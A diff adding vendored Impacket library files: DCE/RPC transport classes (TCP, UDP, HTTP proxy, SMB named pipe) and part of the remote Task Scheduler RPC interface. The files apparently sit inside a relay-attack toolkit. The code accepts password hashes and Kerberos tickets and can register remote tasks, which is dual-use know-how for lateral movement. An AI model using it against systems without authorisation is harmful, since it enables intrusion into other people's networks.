--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/srvs.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/srvs.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/transport.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/transport.py
@@ -0,0 +1,592 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   Transport implementations for the DCE/RPC protocol.
+#
+from __future__ import division
+from __future__ import print_function
+
+import binascii
+import os
+import re
+import socket
+
+try:
+    from urllib.parse import urlparse, urlunparse
+except ImportError:
+    from urlparse import urlparse, urlunparse
+
+from impacket import ntlm
+from impacket.dcerpc.v5.rpcrt import DCERPCException, DCERPC_v5, DCERPC_v4
+from impacket.dcerpc.v5.rpch import RPCProxyClient, RPCProxyClientException, RPC_OVER_HTTP_v1, RPC_OVER_HTTP_v2
+from impacket.smbconnection import SMBConnection
+
+class DCERPCStringBinding:
+    parser = re.compile(r'(?:([a-fA-F0-9-]{8}(?:-[a-fA-F0-9-]{4}){3}-[a-fA-F0-9-]{12})@)?' # UUID (opt.)
+                        +'([_a-zA-Z0-9]*):' # Protocol Sequence
+                        +'([^\[]*)' # Network Address (opt.)
+                        +'(?:\[([^\]]*)\])?') # Endpoint and options (opt.)
+
+    def __init__(self, stringbinding):
+        match = DCERPCStringBinding.parser.match(stringbinding)
+        self.__uuid = match.group(1)
+        self.__ps = match.group(2)
+        self.__na = match.group(3)
+        options = match.group(4)
+        if options:
+            options = options.split(',')
+            
+            self.__endpoint = options[0]
+            try:
+                self.__endpoint.index('endpoint=')
+                self.__endpoint = self.__endpoint[len('endpoint='):]
+            except:
+                pass
+
+            self.__options = {}
+            for option in options[1:]:
+                vv = option.split('=', 1)
+                self.__options[vv[0]] = vv[1] if len(vv) > 1 else ''
+        else:
+            self.__endpoint = ''
+            self.__options = {}
+
+    def get_uuid(self):
+        return self.__uuid
+
+    def get_protocol_sequence(self):
+        return self.__ps
+
+    def get_network_address(self):
+        return self.__na
+
+    def set_network_address(self, addr):
+        self.__na = addr
+
+    def get_endpoint(self):
+        return self.__endpoint
+
+    def get_options(self):
+        return self.__options
+
+    def get_option(self, option_name):
+        return self.__options[option_name]
+
+    def is_option_set(self, option_name):
+        return option_name in self.__options
+
+    def unset_option(self, option_name):
+        del self.__options[option_name]
+
+    def __str__(self):
+        return DCERPCStringBindingCompose(self.__uuid, self.__ps, self.__na, self.__endpoint, self.__options)
+
+def DCERPCStringBindingCompose(uuid=None, protocol_sequence='', network_address='', endpoint='', options={}):
+    s = ''
+    if uuid:
+        s += uuid + '@'
+    s += protocol_sequence + ':'
+    if network_address:
+        s += network_address
+    if endpoint or options:
+        s += '[' + endpoint
+        if options:
+            s += ',' + ','.join([key if str(val) == '' else "=".join([key, str(val)]) for key, val in options.items()])
+        s += ']'
+
+    return s
+
+def DCERPCTransportFactory(stringbinding):
+    sb = DCERPCStringBinding(stringbinding)
+
+    na = sb.get_network_address()
+    ps = sb.get_protocol_sequence()
+    if 'ncadg_ip_udp' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = UDPTransport(na, int(port))
+        else:
+            rpctransport = UDPTransport(na)
+    elif 'ncacn_ip_tcp' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = TCPTransport(na, int(port))
+        else:
+            rpctransport = TCPTransport(na)
+    elif 'ncacn_http' == ps:
+        port = sb.get_endpoint()
+        if port:
+            rpctransport = HTTPTransport(na, int(port))
+        else:
+            rpctransport = HTTPTransport(na)
+    elif 'ncacn_np' == ps:
+        named_pipe = sb.get_endpoint()
+        if named_pipe:
+            named_pipe = named_pipe[len(r'\pipe'):]
+            rpctransport = SMBTransport(na, filename = named_pipe)
+        else:
+            rpctransport = SMBTransport(na)
+    elif 'ncalocal' == ps:
+        named_pipe = sb.get_endpoint()
+        rpctransport = LOCALTransport(filename = named_pipe)
+    else:
+        raise DCERPCException("Unknown protocol sequence.")
+
+    rpctransport.set_stringbinding(sb)
+    return rpctransport
+
+class DCERPCTransport:
+
+    DCERPC_class = DCERPC_v5
+
+    def __init__(self, remoteName, dstport):
+        self.__remoteName = remoteName
+        self.__remoteHost = remoteName
+        self.__dstport = dstport
+        self._stringbinding = None
+        self._max_send_frag = None
+        self._max_recv_frag = None
+        self._domain = ''
+        self._lmhash = ''
+        self._nthash = ''
+        self.__connect_timeout = None
+        self._doKerberos = False
+        self._username = ''
+        self._password = ''
+        self._domain   = ''
+        self._aesKey   = None
+        self._TGT      = None
+        self._TGS      = None
+        self._kdcHost  = None
+        self.set_credentials('','')
+        # Strict host validation - off by default and currently only for
+        # SMBTransport
+        self._strict_hostname_validation = False
+        self._validation_allow_absent = True
+        self._accepted_hostname = ''
+
+    def connect(self):
+        raise RuntimeError('virtual function')
+    def send(self,data=0, forceWriteAndx = 0, forceRecv = 0):
+        raise RuntimeError('virtual function')
+    def recv(self, forceRecv = 0, count = 0):
+        raise RuntimeError('virtual function')
+    def disconnect(self):
+        raise RuntimeError('virtual function')
+    def get_socket(self):
+        raise RuntimeError('virtual function')
+
+    def get_connect_timeout(self):
+        return self.__connect_timeout
+    def set_connect_timeout(self, timeout):
+        self.__connect_timeout = timeout
+
+    def getRemoteName(self):
+        return self.__remoteName
+
+    def setRemoteName(self, remoteName):
+        """This method only makes sense before connection for most protocols."""
+        self.__remoteName = remoteName
+
+    def getRemoteHost(self):
+        return self.__remoteHost
+
+    def setRemoteHost(self, remoteHost):
+        """This method only makes sense before connection for most protocols."""
+        self.__remoteHost = remoteHost
+
+    def get_dport(self):
+        return self.__dstport
+    def set_dport(self, dport):
+        """This method only makes sense before connection for most protocols."""
+        self.__dstport = dport
+
+    def get_stringbinding(self):
+        return self._stringbinding
+
+    def set_stringbinding(self, stringbinding):
+        self._stringbinding = stringbinding
+
+    def get_addr(self):
+        return self.getRemoteHost(), self.get_dport()
+    def set_addr(self, addr):
+        """This method only makes sense before connection for most protocols."""
+        self.setRemoteHost(addr[0])
+        self.set_dport(addr[1])
+
+    def set_kerberos(self, flag, kdcHost = None):
+        self._doKerberos = flag
+        self._kdcHost = kdcHost
+
+    def get_kerberos(self):
+        return self._doKerberos
+
+    def get_kdcHost(self):
+        return self._kdcHost
+
+    def set_max_fragment_size(self, send_fragment_size):
+        # -1 is default fragment size: 0 (don't fragment)
+        #  0 is don't fragment
+        #    other values are max fragment size
+        if send_fragment_size == -1:
+            self.set_default_max_fragment_size()
+        else:
+            self._max_send_frag = send_fragment_size
+
+    def set_hostname_validation(self, validate, accept_empty, hostname):
+        self._strict_hostname_validation = validate
+        self._validation_allow_absent = accept_empty
+        self._accepted_hostname = hostname
+
+    def set_default_max_fragment_size(self):
+        # default is 0: don't fragment.
+        # subclasses may override this method
+        self._max_send_frag = 0
+
+    def get_credentials(self):
+        return (
+            self._username,
+            self._password,
+            self._domain,
+            self._lmhash,
+            self._nthash,
+            self._aesKey,
+            self._TGT,
+            self._TGS)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        self._username = username
+        self._password = password
+        self._domain   = domain
+        self._aesKey   = aesKey
+        self._TGT      = TGT
+        self._TGS      = TGS
+        if lmhash != '' or nthash != '':
+            if len(lmhash) % 2:
+                lmhash = '0%s' % lmhash
+            if len(nthash) % 2:
+                nthash = '0%s' % nthash
+            try: # just in case they were converted already
+               self._lmhash = binascii.unhexlify(lmhash)
+               self._nthash = binascii.unhexlify(nthash)
+            except:
+               self._lmhash = lmhash
+               self._nthash = nthash
+               pass
+
+    def doesSupportNTLMv2(self):
+        # By default we'll be returning the library's default. Only on SMB Transports we might be able to know it beforehand
+        return ntlm.USE_NTLMv2
+
+    def get_dce_rpc(self):
+        return DCERPC_v5(self)
+
+class UDPTransport(DCERPCTransport):
+    "Implementation of ncadg_ip_udp protocol sequence"
+
+    DCERPC_class = DCERPC_v4
+
+    def __init__(self, remoteName, dstport = 135):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = 0
+        self.set_connect_timeout(30)
+        self.__recv_addr = ''
+
+    def connect(self):
+        try:
+            af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_DGRAM)[0]
+            self.__socket = socket.socket(af, socktype, proto)
+            self.__socket.settimeout(self.get_connect_timeout())
+        except socket.error as msg:
+            self.__socket = None
+            raise DCERPCException("Could not connect: %s" % msg)
+
+        return 1
+
+    def disconnect(self):
+        try:
+            self.__socket.close()
+        except socket.error:
+            self.__socket = None
+            return 0
+        return 1
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        self.__socket.sendto(data, (self.getRemoteHost(), self.get_dport()))
+
+    def recv(self, forceRecv = 0, count = 0):
+        buffer, self.__recv_addr = self.__socket.recvfrom(8192)
+        return buffer
+
+    def get_recv_addr(self):
+        return self.__recv_addr
+
+    def get_socket(self):
+        return self.__socket
+
+class TCPTransport(DCERPCTransport):
+    """Implementation of ncacn_ip_tcp protocol sequence"""
+
+    def __init__(self, remoteName, dstport = 135):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = 0
+        self.set_connect_timeout(30)
+
+    def connect(self):
+        af, socktype, proto, canonname, sa = socket.getaddrinfo(self.getRemoteHost(), self.get_dport(), 0, socket.SOCK_STREAM)[0]
+        self.__socket = socket.socket(af, socktype, proto)
+        try:
+            self.__socket.settimeout(self.get_connect_timeout())
+            self.__socket.connect(sa)
+        except socket.error as msg:
+            self.__socket.close()
+            raise DCERPCException("Could not connect: %s" % msg)
+        return 1
+
+    def disconnect(self):
+        try:
+            self.__socket.close()
+        except socket.error:
+            self.__socket = None
+            return 0
+        return 1
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        if self._max_send_frag:
+            offset = 0
+            while 1:
+                toSend = data[offset:offset+self._max_send_frag]
+                if not toSend:
+                    break
+                self.__socket.send(toSend)
+                offset += len(toSend)
+        else:
+            self.__socket.send(data)
+
+    def recv(self, forceRecv = 0, count = 0):
+        if count:
+            buffer = b''
+            while len(buffer) < count:
+               buffer += self.__socket.recv(count-len(buffer))
+        else:
+            buffer = self.__socket.recv(8192)
+        return buffer
+
+    def get_socket(self):
+        return self.__socket
+
+class HTTPTransport(TCPTransport, RPCProxyClient):
+    """Implementation of ncacn_http protocol sequence"""
+
+    def __init__(self, remoteName=None, dstport=593):
+        self._useRpcProxy = False
+        self._rpcProxyUrl = None
+        self._transport   = TCPTransport
+        self._version     = RPC_OVER_HTTP_v2
+
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        RPCProxyClient.__init__(self, remoteName, dstport)
+        self.set_connect_timeout(30)
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        return self._transport.set_credentials(self, username, password,
+            domain, lmhash, nthash, aesKey, TGT, TGS)
+
+    def rpc_proxy_init(self):
+        self._useRpcProxy = True
+        self._transport   = RPCProxyClient
+
+    def set_rpc_proxy_url(self, url):
+        self.rpc_proxy_init()
+        self._rpcProxyUrl = urlparse(url)
+
+    def get_rpc_proxy_url(self):
+        return urlunparse(self._rpcProxyUrl)
+
+    def set_stringbinding(self, set_stringbinding):
+        DCERPCTransport.set_stringbinding(self, set_stringbinding)
+
+        if self._stringbinding.is_option_set("RpcProxy"):
+            self.rpc_proxy_init()
+
+            rpcproxy = self._stringbinding.get_option("RpcProxy").split(":")
+
+            if rpcproxy[1] == '443':
+                self.set_rpc_proxy_url('https://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+            elif rpcproxy[1] == '80':
+                self.set_rpc_proxy_url('http://%s/rpc/rpcproxy.dll' % rpcproxy[0])
+            else:
+                # 2.1.2.1
+                # RPC over HTTP always uses port 80 for HTTP traffic and port 443 for HTTPS traffic.
+                # But you can use set_rpc_proxy_url method to set any URL / query you want.
+                raise DCERPCException("RPC Proxy port must be 80 or 443")
+
+    def connect(self):
+        if self._useRpcProxy == False:
+            # Connecting directly to the ncacn_http port
+            #
+            # Here we using RPC over HTTPv1 instead complex RPC over HTTP v2 syntax
+            # RPC over HTTP v2 here can be implemented in the future
+            self._version = RPC_OVER_HTTP_v1
+
+            TCPTransport.connect(self)
+
+            # Reading legacy server response
+            data = self.get_socket().recv(8192)
+
+            if data != b'ncacn_http/1.0':
+                raise DCERPCException("%s:%s service is not ncacn_http" % (self.__remoteName, self.__dstport))
+        else:
+            RPCProxyClient.connect(self)
+
+    def send(self, data, forceWriteAndx=0, forceRecv=0):
+        return self._transport.send(self, data, forceWriteAndx, forceRecv)
+
+    def recv(self, forceRecv=0, count=0):
+        return self._transport.recv(self, forceRecv, count)
+
+    def get_socket(self):
+        if self._useRpcProxy == False:
+            return TCPTransport.get_socket(self)
+        else:
+            raise DCERPCException("This method is not supported for RPC Proxy connections")
+
+    def disconnect(self):
+        return self._transport.disconnect(self)
+
+class SMBTransport(DCERPCTransport):
+    """Implementation of ncacn_np protocol sequence"""
+
+    def __init__(self, remoteName, dstport=445, filename='', username='', password='', domain='', lmhash='', nthash='',
+                 aesKey='', TGT=None, TGS=None, remote_host='', smb_connection=0, doKerberos=False, kdcHost=None):
+        DCERPCTransport.__init__(self, remoteName, dstport)
+        self.__socket = None
+        self.__tid = 0
+        self.__filename = filename
+        self.__handle = 0
+        self.__pending_recv = 0
+        self.set_credentials(username, password, domain, lmhash, nthash, aesKey, TGT, TGS)
+        self._doKerberos = doKerberos
+        self._kdcHost = kdcHost
+
+        if remote_host != '':
+            self.setRemoteHost(remote_host)
+
+        if smb_connection == 0:
+            self.__existing_smb = False
+        else:
+            self.__existing_smb = True
+            self.set_credentials(*smb_connection.getCredentials())
+
+        self.__prefDialect = None
+        self.__smb_connection = smb_connection
+        self.set_connect_timeout(30)
+
+    def preferred_dialect(self, dialect):
+        self.__prefDialect = dialect
+
+    def setup_smb_connection(self):
+        if not self.__smb_connection:
+            self.__smb_connection = SMBConnection(self.getRemoteName(), self.getRemoteHost(), sess_port=self.get_dport(),
+                                                  preferredDialect=self.__prefDialect, timeout=self.get_connect_timeout())
+            if self._strict_hostname_validation:
+                self.__smb_connection.setHostnameValidation(self._strict_hostname_validation, self._validation_allow_absent, self._accepted_hostname)
+
+    def connect(self):
+        # Check if we have a smb connection already setup
+        if self.__smb_connection == 0:
+            self.setup_smb_connection()
+            if self._doKerberos is False:
+                self.__smb_connection.login(self._username, self._password, self._domain, self._lmhash, self._nthash)
+            else:
+                self.__smb_connection.kerberosLogin(self._username, self._password, self._domain, self._lmhash,
+                                                    self._nthash, self._aesKey, kdcHost=self._kdcHost, TGT=self._TGT,
+                                                    TGS=self._TGS)
+        self.__tid = self.__smb_connection.connectTree('IPC$')
+        self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
+        self.__socket = self.__smb_connection.getSMBServer().get_socket()
+        return 1
+
+    def disconnect(self):
+        self.__smb_connection.disconnectTree(self.__tid)
+        # If we created the SMB connection, we close it, otherwise
+        # that's up for the caller
+        if self.__existing_smb is False:
+            self.__smb_connection.logoff()
+            self.__smb_connection.close()
+            self.__smb_connection = 0
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        if self._max_send_frag:
+            offset = 0
+            while 1:
+                toSend = data[offset:offset+self._max_send_frag]
+                if not toSend:
+                    break
+                self.__smb_connection.writeFile(self.__tid, self.__handle, toSend, offset = offset)
+                offset += len(toSend)
+        else:
+            self.__smb_connection.writeFile(self.__tid, self.__handle, data)
+        if forceRecv:
+            self.__pending_recv += 1
+
+    def recv(self, forceRecv = 0, count = 0 ):
+        if self._max_send_frag or self.__pending_recv:
+            # _max_send_frag is checked because it's the same condition we checked
+            # to decide whether to use write_andx() or send_trans() in send() above.
+            if self.__pending_recv:
+                self.__pending_recv -= 1
+            return self.__smb_connection.readFile(self.__tid, self.__handle, bytesToRead = self._max_recv_frag)
+        else:
+            return self.__smb_connection.readFile(self.__tid, self.__handle)
+
+    def get_smb_connection(self):
+        return self.__smb_connection
+
+    def set_smb_connection(self, smb_connection):
+        self.__smb_connection = smb_connection
+        self.set_credentials(*smb_connection.getCredentials())
+        self.__existing_smb = True
+
+    def get_smb_server(self):
+        # Raw Access to the SMBServer (whatever type it is)
+        return self.__smb_connection.getSMBServer()
+
+    def get_socket(self):
+        return self.__socket
+
+    def doesSupportNTLMv2(self):
+        return self.__smb_connection.doesSupportNTLMv2()
+
+class LOCALTransport(DCERPCTransport):
+    """
+    Implementation of ncalocal protocol sequence, not the same
+    as ncalrpc (I'm not doing LPC just opening the local pipe)
+    """
+
+    def __init__(self, filename = ''):
+        DCERPCTransport.__init__(self, '', 0)
+        self.__filename = filename
+        self.__handle = 0
+
+    def connect(self):
+        if self.__filename.upper().find('PIPE') < 0:
+            self.__filename = '\\PIPE\\%s' % self.__filename
+        self.__handle = os.open('\\\\.\\%s' % self.__filename, os.O_RDWR|os.O_BINARY)
+        return 1
+
+    def disconnect(self):
+        os.close(self.__handle)
+
+    def send(self,data, forceWriteAndx = 0, forceRecv = 0):
+        os.write(self.__handle, data)
+
+    def recv(self, forceRecv = 0, count = 0 ):
+        data = os.read(self.__handle, 65535)
+        return data
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/tsch.py
@@ -0,0 +1,799 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ITaskSchedulerService Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR, NULL, GUID, PSYSTEMTIME, SYSTEMTIME
+from impacket.structure import Structure
+from impacket import hresult_errors, system_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_TSCHS  = uuidtup_to_bin(('86D35949-83C9-4044-B424-DB363231FD0C','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        elif key & 0xffff in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+# 2.3.9 TASK_LOGON_TYPE
+TASK_LOGON_NONE                          = 0
+TASK_LOGON_PASSWORD                      = 1
+TASK_LOGON_S4U                           = 2
+TASK_LOGON_INTERACTIVE_TOKEN             = 3
+TASK_LOGON_GROUP                         = 4
+TASK_LOGON_SERVICE_ACCOUNT               = 5
+TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD = 6
+
+# 2.3.13 TASK_STATE
+TASK_STATE_UNKNOWN  = 0
+TASK_STATE_DISABLED = 1
+TASK_STATE_QUEUED   = 2
+TASK_STATE_READY    = 3
+TASK_STATE_RUNNING  = 4
+
+# 2.4.1 FIXDLEN_DATA
+SCHED_S_TASK_READY         = 0x00041300
+SCHED_S_TASK_RUNNING       = 0x00041301
+SCHED_S_TASK_NOT_SCHEDULED = 0x00041301
+
+# 2.4.2.11 Triggers
+TASK_TRIGGER_FLAG_HAS_END_DATE         = 0
+TASK_TRIGGER_FLAG_KILL_AT_DURATION_END = 0
+TASK_TRIGGER_FLAG_DISABLED             = 0
+
+# ToDo: Change this to enums
+ONCE                 = 0
+DAILY                = 1
+WEEKLY               = 2
+MONTHLYDATE          = 3
+MONTHLYDOW           = 4
+EVENT_ON_IDLE        = 5
+EVENT_AT_SYSTEMSTART = 6
+EVENT_AT_LOGON       = 7
+
+SUNDAY    = 0
+MONDAY    = 1
+TUESDAY   = 2
+WEDNESDAY = 3
+THURSDAY  = 4
+FRIDAY    = 5
+SATURDAY  = 6
+
+JANUARY   = 1
+FEBRUARY  = 2
+MARCH     = 3
+APRIL     = 4
+MAY       = 5
+JUNE      = 6
+JULY      = 7
+AUGUST    = 8
+SEPTEMBER = 9
+OCTOBER   = 10
+NOVEMBER  = 11
+DECEMBER  = 12
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+FIRST_WEEK  = 1
+SECOND_WEEK = 2
+THIRD_WEEK  = 3
+FOURTH_WEEK = 4
+LAST_WEEK   = 5
+
+# 2.3.12 TASK_NAMES
+TASK_NAMES = LPWSTR
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+TASK_VALIDATE_ONLY                = 1<<(31-31)
+TASK_CREATE                       = 1<<(31-30)
+TASK_UPDATE                       = 1<<(31-29)
+TASK_DISABLE                      = 1<<(31-28)
+TASK_DON_ADD_PRINCIPAL_ACE        = 1<<(31-27)
+TASK_IGNORE_REGISTRATION_TRIGGERS = 1<<(31-26)
+
+# 3.2.5.4.5 SchRpcSetSecurity (Opnum 4)
+TASK_DONT_ADD_PRINCIPAL_ACE = 1<<(31-27)
+SCH_FLAG_FOLDER             = 1<<(31-2)
+SCH_FLAG_TASK               = 1<<(31-1) 
+
+# 3.2.5.4.7 SchRpcEnumFolders (Opnum 6)
+TASK_ENUM_HIDDEN = 1
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+TASK_RUN_AS_SELF            = 1<<(31-31)
+TASK_RUN_IGNORE_CONSTRAINTS = 1<<(31-30)
+TASK_RUN_USE_SESSION_ID     = 1<<(31-29)
+TASK_RUN_USER_SID           = 1<<(31-28)
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+SCH_FLAG_STATE            = 1<<(31-3)
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.12 TASK_NAMES
+class TASK_NAMES_ARRAY(NDRUniConformantArray):
+    item = TASK_NAMES
+
+class PTASK_NAMES_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',TASK_NAMES_ARRAY),
+    )
+
+class WSTR_ARRAY(NDRUniConformantArray):
+    item = WSTR
+
+class PWSTR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',WSTR_ARRAY),
+    )
+
+class GUID_ARRAY(NDRUniConformantArray):
+    item = GUID
+
+class PGUID_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',GUID_ARRAY),
+    )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SYSTEMTIME_ARRAY(NDRUniConformantArray):
+    item = SYSTEMTIME
+
+class PSYSTEMTIME_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',SYSTEMTIME_ARRAY),
+    )
+
+# 2.3.8 TASK_USER_CRED
+class TASK_USER_CRED(NDRSTRUCT):
+    structure =  (
+        ('userId',LPWSTR),
+        ('password',LPWSTR),
+        ('flags',DWORD),
+    )
+
+class TASK_USER_CRED_ARRAY(NDRUniConformantArray):
+    item = TASK_USER_CRED
+
+class LPTASK_USER_CRED_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',TASK_USER_CRED_ARRAY),
+    )
+
+# 2.3.10 TASK_XML_ERROR_INFO
+class TASK_XML_ERROR_INFO(NDRSTRUCT):
+    structure =  (
+        ('line',DWORD),
+        ('column',DWORD),
+        ('node',LPWSTR),
+        ('value',LPWSTR),
+    )
+
+class PTASK_XML_ERROR_INFO(NDRPOINTER):
+    referent = (
+        ('Data',TASK_XML_ERROR_INFO),
+    )
+
+# 2.4.1 FIXDLEN_DATA
+class FIXDLEN_DATA(Structure):
+    structure = (
+        ('Product Version','<H=0'),
+        ('File Version','<H=0'),
+        ('Job uuid','16s="'),
+        ('App Name Len Offset','<H=0'),
+        ('Trigger Offset','<H=0'),
+        ('Error Retry Count','<H=0'),
+        ('Error Retry Interval','<H=0'),
+        ('Idle Deadline','<H=0'),
+        ('Idle Wait','<H=0'),
+        ('Priority','<L=0'),
+        ('Maximum Run Time','<L=0'),
+        ('Exit Code','<L=0'),
+        ('Status','<L=0'),
+        ('Flags','<L=0'),
+    )
+
+# 2.4.2.11 Triggers
+class TRIGGERS(Structure):
+    structure = (
+        ('Trigger Size','<H=0'),
+        ('Reserved1','<H=0'),
+        ('Begin Year','<H=0'),
+        ('Begin Month','<H=0'),
+        ('Begin Day','<H=0'),
+        ('End Year','<H=0'),
+        ('End Month','<H=0'),
+        ('End Day','<H=0'),
+        ('Start Hour','<H=0'),
+        ('Start Minute','<H=0'),
+        ('Minutes Duration','<L=0'),
+        ('Minutes Interval','<L=0'),
+        ('Flags','<L=0'),
+        ('Trigger Type','<L=0'),
+        ('TriggerSpecific0','<H=0'),
+        ('TriggerSpecific1','<H=0'),
+        ('TriggerSpecific2','<H=0'),
+        ('Padding','<H=0'),
+        ('Reserved2','<H=0'),
+        ('Reserved3','<H=0'),
+    )
+
+# 2.4.2.11.6 WEEKLY Trigger
+class WEEKLY(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('Weeks Interval','<H=0'),
+        ('DaysOfTheWeek','<H=0'),
+        ('Unused','<H=0'),
+        ('Padding','<H=0'),
+    )
+
+# 2.4.2.11.7 MONTHLYDATE Trigger
+class MONTHLYDATE(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('Days','<L=0'),
+        ('Months','<H=0'),
+        ('Padding','<H=0'),
+    )
+
+# 2.4.2.11.8 MONTHLYDOW Trigger
+class MONTHLYDOW(Structure):
+    structure = (
+        ('Trigger Type','<L=0'),
+        ('WhichWeek','<H=0'),
+        ('DaysOfTheWeek','<H=0'),
+        ('Months','<H=0'),
+        ('Padding','<H=0'),
+        ('Reserved2','<H=0'),
+        ('Reserved3','<H=0'),
+    )
+
+# 2.4.2.12 Job Signature
+class JOB_SIGNATURE(Structure):
+    structure = (
+        ('SignatureVersion','<HH0'),
+        ('MinClientVersion','<H=0'),
+        ('Signature','64s="'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.4.1 SchRpcHighestVersion (Opnum 0)
+class SchRpcHighestVersion(NDRCALL):
+    opnum = 0
+    structure = (
+    )
+
+class SchRpcHighestVersionResponse(NDRCALL):
+    structure = (
+        ('pVersion', DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.2 SchRpcRegisterTask (Opnum 1)
+class SchRpcRegisterTask(NDRCALL):
+    opnum = 1
+    structure = (
+        ('path', LPWSTR),
+        ('xml', WSTR),
+        ('flags', DWORD),
+        ('sddl', LPWSTR),
+        ('logonType', DWORD),
+        ('cCreds', DWORD),
+        ('pCreds', LPTASK_USER_CRED_ARRAY),
+    )
+
+class SchRpcRegisterTaskResponse(NDRCALL):
+    structure = (
+        ('pActualPath', LPWSTR),
+        ('pErrorInfo', PTASK_XML_ERROR_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.3 SchRpcRetrieveTask (Opnum 2)
+class SchRpcRetrieveTask(NDRCALL):
+    opnum = 2
+    structure = (
+        ('path', WSTR),
+        ('lpcwszLanguagesBuffer', WSTR),
+        ('pulNumLanguages', DWORD),
+    )
+
+class SchRpcRetrieveTaskResponse(NDRCALL):
+    structure = (
+        ('pXml', LPWSTR),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.4 SchRpcCreateFolder (Opnum 3)
+class SchRpcCreateFolder(NDRCALL):
+    opnum = 3
+    structure = (
+        ('path', WSTR),
+        ('sddl', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcCreateFolderResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
